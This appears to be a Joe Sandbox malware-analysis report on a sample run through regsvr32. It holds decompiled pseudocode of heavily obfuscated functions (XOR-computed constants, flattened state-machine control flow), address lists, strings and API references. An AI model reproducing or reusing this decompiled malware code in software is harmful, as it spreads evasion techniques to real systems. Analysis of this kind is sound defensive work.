										_v1068 = _v1068 ^ 0x9dfc2f1b;
										_v1076 = 0x3f7beb;
										_v1076 = _v1076 << 2;
										_t586 = 0x15;
										_v1076 = _v1076 * 0x32;
										_v1076 = _v1076 ^ 0x319590cf;
										_v1084 = 0xdc1c09;
										_v1084 = _v1084 + 0xffffa3c8;
										_v1084 = _v1084 + 0xe302;
										_v1084 = _v1084 * 0x7c;
										_v1084 = _v1084 ^ 0x6ad8f801;
										_v1088 = 0x171d29;
										_v1088 = _v1088 + 0xffff33e2;
										_v1088 = _v1088 ^ 0x0019d723;
										_v1092 = 0x81cf7c;
										_v1092 = _v1092 + 0xffff3c49;
										_v1092 = _v1092 * 0x6c;
										_v1092 = _v1092 / _t586;
										_v1092 = _v1092 ^ 0x0294ef51;
										_t498 = E04F78CA8(_t491 + _v1092 + _t491 + _v1092, _v1068, _v1076, _t491 + _v1092 + _t491 + _v1092, _v1084, _v1088, _v1092, _t522,  &_v1040, _v1056);
										_t589 =  &(_t589[0xb]);
										__eflags = _t498;
										_t583 = 0xc7fe0;
										_v1060 = 0 | _t498 == 0x00000000;
										while(1) {
											L1:
											_t525 = 0x5c;
											goto L2;
										}
									} else {
										if(_t583 == 0xa2657) {
											_v1080 = 0xd15d71;
											_v1080 = _v1080 + 0xffffad43;
											_v1080 = _v1080 + 0xfffface5;
											_v1080 = _v1080 << 8;
											_v1080 = _v1080 ^ 0xd0b350c3;
											_v1092 = 0xef3ca;
											_v1092 = _v1092 + 0xffff8917;
											_v1092 = _v1092 << 5;
											_v1092 = _v1092 ^ 0x01c68cdb;
											_v1088 = 0xef5040;
											_t23 =  &_v1088; // 0xef5040
											_t541 = 0x1d;
											_v1088 =  *_t23 / _t541;
											_v1088 = _v1088 ^ 0x000cf463;
											_v1072 = 0x9ab7aa;
											_v1072 = _v1072 + 0xffffa611;
											_v1072 = _v1072 ^ 0x56a73a22;
											_v1072 = _v1072 ^ 0x56382263;
											_t38 =  &_v1072; // 0x56382263
											_t501 = E04F7D6A7(_v1080, _v1092, _v1088, 0x4f6140c,  *_t38);
											_v1084 = 0x2a2a19;
											_v1084 = _v1084 + 0xffff19bc;
											_v1084 = _v1084 << 4;
											_t543 = 7;
											_v1084 = _v1084 / _t543;
											_v1084 = _v1084 ^ 0x0057c364;
											_v1088 = 0xff2412;
											_t544 = 0xe;
											_v1088 = _v1088 * 0x4d;
											_v1088 = _v1088 ^ 0x4cb80f89;
											_v1076 = 0x5e504a;
											_v1076 = _v1076 | 0x3ba7ff5b;
											_v1076 = _v1076 + 0xffff1bc7;
											_v1076 = _v1076 ^ 0x3bf9ab98;
											_v1080 = 0xc79f34;
											_v1080 = _v1080 + 0xbb24;
											_v1080 = _v1080 * 0x11;
											_v1080 = _v1080 + 0x861d;
											_v1080 = _v1080 ^ 0x0d44d84a;
											_v1092 = 0x8aee89;
											_v1092 = _v1092 >> 7;
											_v1092 = _v1092 + 0xc3d6;
											_v1092 = _v1092 ^ 0x000e4106;
											_v1072 = 0x101800;
											_v1072 = _v1072 / _t544;
											_v1072 = _v1072 * 0x35;
											_v1072 = _v1072 ^ 0x00363537;
											_t545 =  *0x4f8221c; // 0x33fd420
											_t96 = _t545 + 4; // 0x33fd424
											_t98 = _t545 + 0x220; // 0x33fd640
											E04F7F342(_v1088, __eflags, _v1076, _t545, _v1080, _t501, _v1092, _t98,  &_v1040, _t96, _v1072,  &_v520);
											_v1076 = 0x8a2f18;
											_v1076 = _v1076 + 0xd764;
											_v1076 = _v1076 ^ 0x0080e7bf;
											_v1064 = 0x8727ef;
											_v1064 = _v1064 * 0x1f;
											_v1064 = _v1064 ^ 0x105efb9c;
											_v1068 = 0x8ea258;
											_v1068 = _v1068 ^ 0x9cdff000;
											_v1068 = _v1068 ^ 0x9c587f3b;
											_v1088 = 0xeac6b7;
											_v1088 = _v1088 + 0xffffcde0;
											_v1088 = _v1088 ^ 0x00e6ae19;
											E04F6845B(_v1076, _v1064, _v1068, _v1088, _t501);
											_t589 =  &(_t589[0x10]);
											_t583 = 0xd2bd4;
											while(1) {
												L1:
												_t525 = 0x5c;
												goto L2;
											}
										} else {
											if(_t583 == 0xc7fe0) {
												_v1068 = 0x8941a5;
												_v1068 = _v1068 + 0xffff5748;
												_t548 = 0x68;
												_v1068 = _v1068 / _t548;
												_v1068 = _v1068 ^ 0x000a6695;
												_v1088 = 0xe5bdce;
												_t549 = 0x5a;
												_v1088 = _v1088 / _t549;
												_v1088 = _v1088 >> 6;
												_v1088 = _v1088 ^ 0x0005bcae;
												_v1064 = 0x511a0f;
												_v1064 = _v1064 << 3;
												_t457 =  &_v1064;
												 *_t457 = _v1064 ^ 0x028dce28;
												__eflags =  *_t457;
												E04F7F559(_v1068, _v1088, _v1056, _v1064);
											} else {
												if(_t583 != 0xd2bd4) {
													goto L17;
												} else {
													_t523 =  *0x4f8221c; // 0x33fd420
													_t524 = _t523 + 0x220;
													while( *_t524 != _t525) {
														_t524 = _t524 + 2;
														__eflags = _t524;
													}
													_t522 = _t524 + 2;
													_t583 = 0x11eec;
													L2:
													_t465 = 0x7afce;
													continue;
												}
											}
										}
									}
								}
							}
							L20:
							return _v1060;
							L17:
							__eflags = _t583 - 0x89675;
						} while (_t583 != 0x89675);
						goto L20;
					}
				}
			}

0x04f7630a
0x04f76314
0x04f7631d
0x04f76326
0x04f7632b
0x04f76333
0x04f76338
0x04f7633c
0x04f7633c
0x04f7633e
0x04f7633f
0x04f7633f
0x04f7633f
0x04f76344
0x04f76344
0x04f76346
0x04f76877
0x04f76881
0x04f76887
0x04f7688a
0x04f7688e
0x04f76896
0x04f768a3
0x04f768a7
0x04f768ac
0x04f768b4
0x04f768bc
0x04f768c4
0x04f768cc
0x04f768d4
0x04f768dc
0x04f768e1
0x04f768e9
0x04f768f1
0x04f7690e
0x04f76913
0x04f7691d
0x04f76928
0x04f76939
0x04f7693c
0x04f76940
0x04f76948
0x04f76950
0x04f7695b
0x04f7695c
0x04f76962
0x04f7696a
0x04f76972
0x04f76980
0x04f76984
0x04f76989
0x04f76991
0x04f76999
0x04f769a1
0x04f769a6
0x04f769ab
0x04f769b3
0x04f769bb
0x04f769c3
0x04f769cb
0x04f769d3
0x04f769db
0x04f769e3
0x04f769eb
0x04f769f3
0x04f76a00
0x04f76a08
0x04f76a10
0x04f76a18
0x04f76a20
0x04f76a28
0x04f76a2d
0x04f76a32
0x04f76a60
0x04f76a65
0x04f76a6d
0x04f76a79
0x04f76a7c
0x04f76a84
0x04f76a8e
0x04f76a96
0x04f76a9e
0x04f76aa3
0x04f76ab1
0x04f76ab5
0x04f76ab9
0x04f76ac1
0x04f76ac9
0x04f76ace
0x04f76ad2
0x04f76ada
0x04f76ae2
0x04f76aea
0x04f76aef
0x04f76af7
0x04f76af7
0x04f76af7
0x04f76b0f
0x04f76b14
0x04f76b17
0x04f76b1e
0x00000000
0x04f7634c
0x04f76352
0x04f76782
0x04f7678c
0x04f76797
0x04f7679a
0x04f7679e
0x04f767a6
0x04f767ae
0x04f767b6
0x04f767be
0x04f767c6
0x04f767ce
0x04f767d6
0x04f767db
0x04f767e0
0x04f767e8
0x04f767f0
0x04f767f5
0x04f76802
0x04f7680d
0x04f76815
0x04f7681d
0x04f76825
0x04f7682d
0x04f76835
0x04f7683d
0x04f76842
0x04f76865
0x04f7686a
0x04f7686d
0x00000000
0x04f76358
0x04f7635a
0x04f765d1
0x04f765d9
0x04f765e1
0x04f765ee
0x04f765f2
0x04f765fa
0x04f76602
0x04f76607
0x04f7660f
0x04f76617
0x04f7661f
0x04f76627
0x04f7662c
0x04f76634
0x04f7663c
0x04f76646
0x04f7664e
0x04f76656
0x04f7665e
0x04f76666
0x04f7666e
0x04f76676
0x04f7668f
0x04f7669c
0x04f766a6
0x04f766ae
0x04f766b6
0x04f766be
0x04f766ca
0x04f766ce
0x04f766d2
0x04f766da
0x04f766e2
0x04f766ea
0x04f766f7
0x04f766fb
0x04f76703
0x04f7670b
0x04f76713
0x04f7671b
0x04f76723
0x04f76730
0x04f7673a
0x04f76742
0x04f76765
0x04f7676c
0x04f7676f
0x04f76771
0x04f76779
0x04f7633c
0x04f7633c
0x04f7633e
0x00000000
0x04f7633e
0x04f76360
0x04f76366
0x04f7639d
0x04f763a7
0x04f763af
0x04f763b7
0x04f763bc
0x04f763c4
0x04f763cc
0x04f763d4
0x04f763d9
0x04f763e1
0x04f763e9
0x04f763ef
0x04f763f2
0x04f763f6
0x04f763fe
0x04f76406
0x04f7640e
0x04f76416
0x04f7641e
0x04f76433
0x04f76438
0x04f76443
0x04f7644d
0x04f7645a
0x04f7645f
0x04f76465
0x04f7646d
0x04f7647a
0x04f7647b
0x04f7647f
0x04f76487
0x04f7648f
0x04f76497
0x04f7649f
0x04f764a7
0x04f764af
0x04f764bc
0x04f764c0
0x04f764c8
0x04f764d0
0x04f764d8
0x04f764dd
0x04f764e5
0x04f764ed
0x04f764fb
0x04f76504
0x04f7650f
0x04f7651c
0x04f76522
0x04f7652b
0x04f76548
0x04f7654d
0x04f76555
0x04f7655d
0x04f76565
0x04f76573
0x04f76577
0x04f7657f
0x04f76587
0x04f7658f
0x04f76597
0x04f7659f
0x04f765a7
0x04f765bf
0x04f765c4
0x04f765c7
0x04f7633c
0x04f7633c
0x04f7633e
0x00000000
0x04f7633e
0x04f76368
0x04f7636e
0x04f76b2d
0x04f76b37
0x04f76b45
0x04f76b4a
0x04f76b50
0x04f76b58
0x04f76b64
0x04f76b67
0x04f76b6b
0x04f76b70
0x04f76b78
0x04f76b80
0x04f76b85
0x04f76b85
0x04f76b85
0x04f76b9d
0x04f76374
0x04f7637a
0x00000000
0x04f76380
0x04f76380
0x04f76386
0x04f76391
0x04f7638e
0x04f7638e
0x04f7638e
0x04f76396
0x04f76399
0x04f7633f
0x04f7633f
0x00000000
0x04f7633f
0x04f7637a
0x04f7636e
0x04f76366
0x04f7635a
0x04f76352
0x04f76ba4
0x04f76bb2
0x04f76b1f
0x04f76b1f
0x04f76b1f
0x00000000
0x04f76b2b
0x04f7633f

Strings

W, xrefs: 04F769DB
FG, xrefs: 04F76881
W&, xrefs: 04F76360
c"8V, xrefs: 04F7641E
0$, xrefs: 04F767F5
p, xrefs: 04F76A84
W&, xrefs: 04F7686D
$pg, xrefs: 04F76AC9
|b., xrefs: 04F76991
JP^, xrefs: 04F76487
{?, xrefs: 04F766B6
@P, xrefs: 04F763E9

Memory Dump Source

Source File: 00000002.00000002.415134102.0000000004F61000.00000020.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000002.00000002.415129850.0000000004F60000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.415356193.0000000004F82000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f60000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: $pg$0$$@P$FG$JP^$W&$W&$W$c"8V$|b.$p${?
API String ID: 0-2433367379
Opcode ID: a8adf8feee4dfbd92ba1ad384f48fb20a67c29da0fe83cf10ff561a5baf8f2f8
Instruction ID: d9a6ccad3c53638982bde8d1b7ae3090235d8e97ff2b72b50a9b67742edbceb0
Opcode Fuzzy Hash: a8adf8feee4dfbd92ba1ad384f48fb20a67c29da0fe83cf10ff561a5baf8f2f8
Instruction Fuzzy Hash: 6722F1B25083429FD348CF65D94980FBBE1BBD8758F008A1DF19996260D3B5DA4ACF87

Uniqueness

Uniqueness Score: -1.00%

Function 10023806 Relevance: 15.1, APIs: 10, Instructions: 102
stringfileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10023806(void* __ebx, void* __edi, void* __esi) {
				intOrPtr _t33;
				long _t35;
				intOrPtr* _t36;
				void* _t43;
				void* _t49;
				CHAR* _t69;
				void* _t74;
				void* _t76;

				E10011A8C(E1002AA23, _t76);
				_t33 =  *0x100371f4; // 0x39cf7dc9
				_t69 =  *(_t76 + 8);
				 *((intOrPtr*)(_t76 - 0x10)) = _t33;
				_t35 = GetFullPathNameA( *(_t76 + 0xc), 0x104, _t69, _t76 - 0x154);
				if(_t35 != 0) {
					if(_t35 < 0x104) {
						_t36 = E1002320B();
						_t67 =  *_t36;
						 *(_t76 + 8) =  *((intOrPtr*)( *_t36 + 0xc))() + 0x10;
						 *((intOrPtr*)(_t76 - 4)) = 0;
						E100237C4(_t69, _t76 + 8);
						if(PathIsUNCA( *(_t76 + 8)) != 0) {
							L15:
							_t74 = 1;
						} else {
							if(GetVolumeInformationA( *(_t76 + 8), 0, 0, 0, _t76 - 0x15c, _t76 - 0x158, 0, 0) != 0) {
								if(( *(_t76 - 0x158) & 0x00000002) == 0) {
									CharUpperA(_t69);
								}
								if(( *(_t76 - 0x158) & 0x00000004) != 0) {
									goto L15;
								} else {
									_t49 = FindFirstFileA( *(_t76 + 0xc), _t76 - 0x150);
									if(_t49 == 0xffffffff) {
										goto L15;
									} else {
										FindClose(_t49);
										if( *(_t76 - 0x154) == 0 ||  *(_t76 - 0x154) <= _t69 || lstrlenA(_t76 - 0x124) - _t69 +  *(_t76 - 0x154) >= 0x104) {
											goto L6;
										} else {
											lstrcpyA( *(_t76 - 0x154), _t76 - 0x124);
											goto L15;
										}
									}
								}
							} else {
								L6:
								_t74 = 0;
							}
						}
						E10002EB0( &(( *(_t76 + 8))[0xfffffffffffffff0]), _t67);
						_t43 = _t74;
					} else {
						goto L3;
					}
				} else {
					lstrcpynA(_t69,  *(_t76 + 0xc), 0x104);
					L3:
					_t43 = 0;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t76 - 0xc));
				return E10011A49(_t43,  *((intOrPtr*)(_t76 - 0x10)));
			}

0x1002380b
0x10023816
0x1002381e
0x10023821
0x10023835
0x1002383f
0x10023850
0x10023859
0x1002385e
0x10023868
0x10023870
0x10023873
0x10023883
0x1002391e
0x10023920
0x10023889
0x100238a7
0x100238b4
0x100238b7
0x100238b7
0x100238c4
0x00000000
0x100238c6
0x100238d0
0x100238d9
0x00000000
0x100238db
0x100238dc
0x100238e8
0x00000000
0x1002390b
0x10023918
0x00000000
0x10023918
0x100238e8
0x100238d9
0x100238a9
0x100238a9
0x100238a9
0x100238a9
0x100238a7
0x10023927
0x1002392c
0x00000000
0x00000000
0x00000000
0x10023841
0x10023846
0x10023852
0x10023852
0x10023852
0x10023933
0x10023944

APIs

__EH_prolog.LIBCMT ref: 1002380B
GetFullPathNameA.KERNEL32(?,00000104,?,?,?,?,?), ref: 10023835
lstrcpynA.KERNEL32(?,?,00000104,?,?,?), ref: 10023846

Part of subcall function 100237C4: lstrcpynA.KERNEL32(00000000,?,00000104,?,?,?), ref: 100237E9
Part of subcall function 100237C4: PathStripToRootA.SHLWAPI(00000000,?,?,?), ref: 100237F0

PathIsUNCA.SHLWAPI(?,?,?,?,?,?), ref: 1002387B
GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000,?,?,?), ref: 1002389F
CharUpperA.USER32(?,?,?,?), ref: 100238B7
FindFirstFileA.KERNEL32(?,?,?,?,?), ref: 100238D0
FindClose.KERNEL32(00000000,?,?,?), ref: 100238DC
lstrlenA.KERNEL32(?,?,?,?), ref: 100238F9
lstrcpyA.KERNEL32(?,?,?,?,?), ref: 10023918

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Path$Findlstrcpyn$CharCloseFileFirstFullH_prologInformationNameRootStripUpperVolumelstrcpylstrlen
String ID:
API String ID: 4080879615-0
Opcode ID: b77f1ac3978eb44781d7087b33618c1d3dc24f14267587a104814371dcc302d8
Instruction ID: cbeb7a53aca0e18478957e39939a260d566e9066c738e7134cbc6e3d23375465
Opcode Fuzzy Hash: b77f1ac3978eb44781d7087b33618c1d3dc24f14267587a104814371dcc302d8
Instruction Fuzzy Hash: 4831E331900629EFDB11CFA0DC88ADEBBBCEF45355F908166F409EA120CB309E95CB50

Uniqueness

Uniqueness Score: -1.00%

Function 04F64A11 Relevance: 14.2, Strings: 11, Instructions: 481
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E04F64A11() {
				char _v520;
				char _v1040;
				intOrPtr _v1044;
				intOrPtr _v1048;
				intOrPtr _v1052;
				intOrPtr _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				void* _t480;
				void* _t486;
				signed int _t552;
				intOrPtr _t553;
				signed int _t555;
				signed int _t556;
				signed int _t557;
				signed int _t559;
				signed int _t560;
				intOrPtr _t561;
				signed int _t563;
				signed int _t570;
				signed int _t571;
				signed int _t572;
				signed int _t573;
				signed int _t574;
				signed int _t575;
				signed int _t577;
				signed int _t578;
				signed int _t581;
				signed int _t582;
				void* _t584;
				signed int _t630;
				intOrPtr _t631;
				signed int _t632;
				signed int _t634;
				signed int _t635;
				signed int _t636;
				signed int _t637;
				signed int* _t639;
				void* _t642;

				_t639 =  &_v1120;
				_t638 = _v1096;
				_t553 = 0;
				_t630 = _v1096;
				_t480 = 0x321dd;
				_v1056 = 0xebb9a;
				_v1052 = 0xf3016;
				_v1048 = 0;
				_v1044 = 0;
				while(1) {
					L1:
					_t555 = _v1084;
					while(1) {
						L2:
						_t584 = 0x5c;
						while(1) {
							L3:
							_t642 = _t480 - 0x9eb40;
							if(_t642 > 0) {
								goto L19;
							}
							L4:
							if(_t642 == 0) {
								_v1068 = 0x2a9071;
								_t570 = 0x22;
								_v1068 = _v1068 / _t570;
								_v1068 = _v1068 ^ 0x00014079;
								_v1096 = 0xc526a3;
								_v1096 = _v1096 + 0xffffcd0c;
								_v1096 = _v1096 ^ 0x00c4f3ad;
								_v1080 = 0xd337bb;
								_t571 = 0x33;
								_v1080 = _v1080 * 0x22;
								_v1080 = _v1080 ^ 0x14d3f1e2;
								_v1080 = _v1080 ^ 0x08de9734;
								_v1108 = 0xe75d87;
								_v1108 = _v1108 / _t571;
								_t572 = 0x12;
								_v1108 = _v1108 * 0x6a;
								_v1108 = _v1108 ^ 0x01e0e092;
								_v1120 = 0x284158;
								_v1120 = _v1120 >> 7;
								_v1120 = _v1120 + 0xffff7aba;
								_v1120 = _v1120 * 0x39;
								_v1120 = _v1120 ^ 0xffff5a75;
								_v1116 = 0x19ad59;
								_v1116 = _v1116 / _t572;
								_v1116 = _v1116 | 0xf1b4f0b5;
								_v1116 = _v1116 << 3;
								_v1116 = _v1116 ^ 0x8daa7887;
								_v1112 = 0xe1ba7a;
								_v1112 = _v1112 | 0x10eaba9d;
								_v1112 = _v1112 >> 5;
								_v1112 = _v1112 ^ 0x0089d803;
								_v1092 = 0x4dd5c9;
								_v1092 = _v1092 | 0x3623e3b3;
								_t573 = 0x4a;
								_v1092 = _v1092 / _t573;
								_v1092 = _v1092 + 0xffff3655;
								_v1092 = _v1092 ^ 0x00b95702;
								_v1072 = 0x9a486e;
								_t574 = 0x14;
								_v1072 = _v1072 * 0x39;
								_v1072 = _v1072 ^ 0x22533fd4;
								_v1084 = 0xcb1a0c;
								_v1084 = _v1084 * 0x3e;
								_v1084 = _v1084 / _t574;
								_v1084 = _v1084 ^ 0x02713fa6;
								_v1076 = 0xa8f7d9;
								_v1076 = _v1076 << 0x10;
								_v1076 = _v1076 << 5;
								_v1076 = _v1076 ^ 0xfb21e2c3;
								_v1088 = 0xb67c23;
								_t575 = 0x63;
								_v1088 = _v1088 / _t575;
								_v1088 = _v1088 << 0xd;
								_v1088 = _v1088 + 0xffff584c;
								_v1088 = _v1088 ^ 0x3af31fcc;
								_v1060 = 0x5b4f13;
								_v1060 = _v1060 * 0xd;
								_v1060 = _v1060 ^ 0x04ad4f83;
								_v1064 = 0x984761;
								_v1064 = _v1064 * 0x44;
								_v1064 = _v1064 ^ 0x28ffc5f5;
								_v1064 = _v1064 + 0xb92;
								_v1064 = _v1064 ^ 0x008c65a0;
								_v1104 = 0x6943ca;
								_v1104 = _v1104 + 0x46d3;
								_v1104 = _v1104 | 0xdb3bbc9a;
								_v1104 = _v1104 << 5;
								_v1104 = _v1104 ^ 0x6f74734b;
								_v1100 = 0x73a7e0;
								_v1100 = _v1100 >> 1;
								_v1100 = _v1100 | 0xae150591;
								_v1100 = _v1100 << 2;
								_v1100 = _v1100 ^ 0xb8f59ffa;
								_t555 = E04F76BB3(_v1096, _v1120, _v1116, _v1108, _t575, _v1112, _v1092, _v1072, _v1084, _v1076,  &_v520, _v1080, _t575, _v1088, _v1068, _v1060, _v1064, _v1104, _v1100, _t630, _t575, _t575, _t630, _t638);
								_t639 =  &(_t639[0x17]);
								_v1084 = _t555;
								__eflags = _t555;
								if(_t555 == 0) {
									_t480 = 0x573db;
								} else {
									_t480 = 0xde7a8;
									_t553 = 1;
								}
								L2:
								_t584 = 0x5c;
								while(1) {
									L3:
									_t642 = _t480 - 0x9eb40;
									if(_t642 > 0) {
										goto L19;
									}
									goto L4;
								}
								goto L19;
							}
							if(_t480 == 0x321dd) {
								_v1100 = 0x223096;
								_v1100 = _v1100 * 0x44;
								_v1100 = _v1100 * 0x22;
								_v1100 = _v1100 + 0x437a;
								_v1100 = _v1100 ^ 0x34c70e03;
								_v1112 = 0x99c2f9;
								_v1112 = _v1112 + 0xffff71a1;
								_v1112 = _v1112 ^ 0x0094ff14;
								_v1104 = 0x39b7ab;
								_v1104 = _v1104 >> 5;
								_v1104 = _v1104 * 0x4e;
								_v1104 = _v1104 ^ 0xbb9dfac0;
								_v1104 = _v1104 ^ 0xbb1cf152;
								_v1116 = 0x6f2274;
								_v1116 = _v1116 | 0xb833e9d9;
								_v1116 = _v1116 << 0xe;
								_v1116 = _v1116 ^ 0xfaf5f688;
								_v1108 = 0xa5f6b;
								_v1108 = _v1108 + 0xd93a;
								_v1108 = _v1108 ^ 0x00069789;
								_v1120 = 0xb1a85f;
								_v1120 = _v1120 ^ 0x49b41aec;
								_v1120 = _v1120 ^ 0x9c94cafc;
								_v1120 = _v1120 ^ 0xd5968b78;
								E04F79F8B(_v1100, _t584, _t555, _v1112,  &_v1040, _v1104, _v1116, _t555, _v1108, _v1120);
								_t639 =  &(_t639[8]);
								_t480 = 0xcdfba;
								while(1) {
									L1:
									_t555 = _v1084;
									goto L2;
								}
							}
							if(_t480 == 0x36826) {
								_t631 =  *0x4f8221c; // 0x33fd420
								_t632 = _t631 + 0x220;
								while(1) {
									__eflags =  *_t632 - _t584;
									if( *_t632 == _t584) {
										break;
									}
									_t632 = _t632 + 2;
									__eflags = _t632;
								}
								_t630 = _t632 + 2;
								_t480 = 0x82519;
								continue;
							}
							if(_t480 == 0x573db) {
								_v1096 = 0x3c976;
								_t577 = 0x44;
								_v1096 = _v1096 / _t577;
								_v1096 = _v1096 ^ 0x00079765;
								_v1120 = 0x7c2127;
								_v1120 = _v1120 | 0x5f462f2e;
								_v1120 = _v1120 + 0xffff56d9;
								_t578 = 0x4d;
								_v1120 = _v1120 / _t578;
								_t476 =  &_v1120;
								 *_t476 = _v1120 ^ 0x013d81ef;
								__eflags =  *_t476;
								E04F7F296(_v1096, _t638, _v1120);
								L28:
								return _t553;
							}
							if(_t480 != 0x82519) {
								L25:
								__eflags = _t480 - 0x96017;
								if(_t480 == 0x96017) {
									goto L28;
								}
								_t555 = _v1084;
								continue;
							}
							_v1104 = 0x5f4762;
							_t9 =  &_v1104; // 0x5f4762
							_t581 = 0x67;
							_v1104 =  *_t9 / _t581;
							_t582 = 0x1d;
							_v1104 = _v1104 * 6;
							_t17 =  &_v1104; // 0x5f4762
							_v1104 =  *_t17 * 0x5f;
							_v1104 = _v1104 ^ 0x020044d9;
							_v1080 = 0x30cb2c;
							_v1080 = _v1080 ^ 0x61da5a74;
							_v1080 = _v1080 ^ 0x61eba0ba;
							_v1076 = 0xafa8c5;
							_v1076 = _v1076 / _t582;
							_v1076 = _v1076 ^ 0x00093821;
							_v1112 = 0x694003;
							_v1112 = _v1112 | 0x961e7a6e;
							_v1112 = _v1112 ^ 0x967be736;
							_v1108 = 0x7c280a;
							_v1108 = _v1108 + 0xda36;
							_v1108 = _v1108 ^ 0x007366d7;
							_t552 = E04F77E14(_v1080, _v1076 % _t582, _v1076, _v1112, _t582, _v1108, _v1104);
							_t638 = _t552;
							_t639 =  &(_t639[5]);
							if(_t552 == 0) {
								goto L28;
							}
							_t480 = 0x9eb40;
							while(1) {
								L1:
								_t555 = _v1084;
								goto L2;
							}
							L19:
							__eflags = _t480 - 0xcdfba;
							if(_t480 == 0xcdfba) {
								_v1112 = 0x8a31c8;
								_t556 = 0x30;
								_v1112 = _v1112 * 0x5a;
								_v1112 = _v1112 + 0xffffba41;
								_v1112 = _v1112 ^ 0x3093061f;
								_v1116 = 0x53818;
								_t557 = 0x2f;
								_v1116 = _v1116 / _t556;
								_v1116 = _v1116 << 8;
								_v1116 = _v1116 >> 2;
								_v1116 = _v1116 ^ 0x000fd688;
								_v1120 = 0xa97ae7;
								_v1120 = _v1120 << 0xf;
								_v1120 = _v1120 + 0xe0d3;
								_v1120 = _v1120 >> 0xb;
								_v1120 = _v1120 ^ 0x001f9952;
								_v1108 = 0xb15bbb;
								_v1108 = _v1108 / _t557;
								_v1108 = _v1108 + 0x11a7;
								_v1108 = _v1108 ^ 0x000ca545;
								_t486 = E04F7D6A7(_v1112, _v1116, _v1120, 0x4f6140c, _v1108);
								_v1112 = 0xc583f0;
								_v1112 = _v1112 | 0x200d27a3;
								_v1112 = _v1112 << 0xc;
								_v1112 = _v1112 ^ 0xda70d5cb;
								_v1088 = 0xcc99a8;
								_t559 = 0x3d;
								_v1088 = _v1088 * 0x2b;
								_v1088 = _v1088 ^ 0x668b33c1;
								_v1088 = _v1088 * 0x27;
								_v1088 = _v1088 ^ 0x7cc84a1a;
								_v1092 = 0x151791;
								_v1092 = _v1092 + 0xfffff7e0;
								_v1092 = _v1092 >> 6;
								_v1092 = _v1092 + 0xe3e2;
								_v1092 = _v1092 ^ 0x0004dac2;
								_v1116 = 0xd22d58;
								_v1116 = _v1116 * 0x6d;
								_v1116 = _v1116 << 0xe;
								_v1116 = _v1116 * 0x4b;
								_v1116 = _v1116 ^ 0x7f40da73;
								_v1108 = 0x299894;
								_v1108 = _v1108 | 0x2901f413;
								_v1108 = _v1108 / _t559;
								_v1108 = _v1108 ^ 0x00ab36cb;
								_v1120 = 0xf9c918;
								_v1120 = _v1120 | 0x9bff6581;
								_t560 = 0x1b;
								_v1120 = _v1120 / _t560;
								_v1120 = _v1120 >> 9;
								_v1120 = _v1120 ^ 0x000e04c5;
								_t561 =  *0x4f8221c; // 0x33fd420
								_t415 = _t561 + 4; // 0x33fd424
								_t417 = _t561 + 0x220; // 0x33fd640
								E04F7F342(_v1088, __eflags, _v1092, _t561, _v1116, _t486, _v1108, _t417,  &_v520, _t415, _v1120,  &_v1040);
								_v1068 = 0x4cb642;
								_v1068 = _v1068 << 0xf;
								_v1068 = _v1068 ^ 0x5b2c91a4;
								_v1072 = 0x325f63;
								_v1072 = _v1072 << 3;
								_v1072 = _v1072 ^ 0x0192f24d;
								_v1120 = 0x7c4ed5;
								_v1120 = _v1120 | 0x2e28e2de;
								_v1120 = _v1120 + 0x83d0;
								_v1120 = _v1120 + 0x5774;
								_v1120 = _v1120 ^ 0x2e72e9a6;
								_v1096 = 0x253eb8;
								_t563 = 0x50;
								_v1096 = _v1096 / _t563;
								_t449 =  &_v1096;
								 *_t449 = _v1096 ^ 0x0000e578;
								__eflags =  *_t449;
								E04F6845B(_v1068, _v1072, _v1120, _v1096, _t486);
								_t639 =  &(_t639[0x10]);
								_t480 = 0x36826;
								_t584 = 0x5c;
								goto L25;
							}
							__eflags = _t480 - 0xd9a4b;
							if(_t480 == 0xd9a4b) {
								_v1112 = 0x2ef141;
								_v1112 = _v1112 + 0xb8d5;
								_t634 = 0x1f;
								_v1112 = _v1112 / _t634;
								_v1112 = _v1112 ^ 0x0008325c;
								_v1108 = 0xc1dbff;
								_v1108 = _v1108 * 0x6b;
								_v1108 = _v1108 + 0xffff633e;
								_v1108 = _v1108 ^ 0x510d9750;
								E04F7F296(_v1112, _t555, _v1108);
								_t480 = 0x573db;
								while(1) {
									L1:
									_t555 = _v1084;
									goto L2;
								}
							}
							__eflags = _t480 - 0xde7a8;
							if(_t480 != 0xde7a8) {
								goto L25;
							}
							_v1116 = 0x248d94;
							_t635 = 0x11;
							_v1116 = _v1116 / _t635;
							_v1116 = _v1116 + 0xffff19cb;
							_t636 = 0x2d;
							_v1116 = _v1116 / _t636;
							_v1116 = _v1116 ^ 0x0002855c;
							_v1120 = 0xff0999;
							_v1120 = _v1120 ^ 0xe2d6ac86;
							_v1120 = _v1120 ^ 0x77119246;
							_t637 = 0x73;
							_v1120 = _v1120 / _t637;
							_v1120 = _v1120 ^ 0x01484a22;
							E04F70F57(_t638, _t555, _v1116, _v1120);
							_t480 = 0xd9a4b;
							goto L1;
						}
					}
				}
			}

0x04f64a11
0x04f64a19
0x04f64a1d
0x04f64a21
0x04f64a25
0x04f64a2a
0x04f64a32
